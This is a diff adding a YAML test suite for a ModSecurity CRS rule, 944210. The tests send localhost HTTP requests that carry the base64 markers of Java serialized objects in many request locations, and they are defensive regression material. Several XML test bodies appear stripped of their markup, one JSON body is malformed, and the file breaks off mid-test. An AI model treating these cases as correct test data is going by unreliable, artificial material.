@@ -0,0 +1,1108 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944210.yaml" + description: "Positive tests for rule 944210" +tests: + - test_title: 944210-0 + desc: "Argument test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-1 + desc: "Argument name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-2 + desc: "Cookie test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-3 + desc: 
"Cookie name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-4 + desc: "Request header test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-5 + desc: "XML element includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-6 + desc: "XML attribute name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-7 + desc: "XML attribute value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-8 + desc: "XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-9 + desc: "Nested XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-10 + desc: "Content-Type text/plain includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-11 + desc: "Content-Type application/json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-12 + desc: "Content-Type application/json arg name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-13 + desc: 
"Content-Type multipart/form-data json arg name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-14 + desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-15 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-16 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-17 + desc: "Argument test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + 
log_contains: "id \"944210\"" + - test_title: 944210-18 + desc: "Argument name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-19 + desc: "Cookie test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-20 + desc: "Cookie name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-21 + desc: "Request header test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" 
+ port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-22 + desc: "XML element includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-23 + desc: "XML attribute name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-24 + desc: "XML attribute value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-25 + desc: "XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-26 + desc: "Nested XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-27 + desc: "Content-Type text/plain includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - 
test_title: 944210-28 + desc: "Content-Type application/json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-29 + desc: "Content-Type application/json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-30 + desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"KztAAU": "test"} + 
-----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-31 + desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"KztAAU": "test\} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-32 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-33 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-34 + desc: "Argument test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-35 + desc: "Argument name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-36 + desc: "Cookie test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" 
+ User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-37 + desc: "Cookie name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-38 + desc: "Request header test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-39 + desc: "XML element includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-40 + desc: "XML attribute name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-41 + desc: "XML attribute value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-42 + desc: "XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-43 + desc: "Nested XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-44 + desc: "Content-Type text/plain includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-45 + desc: "Content-Type application/json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 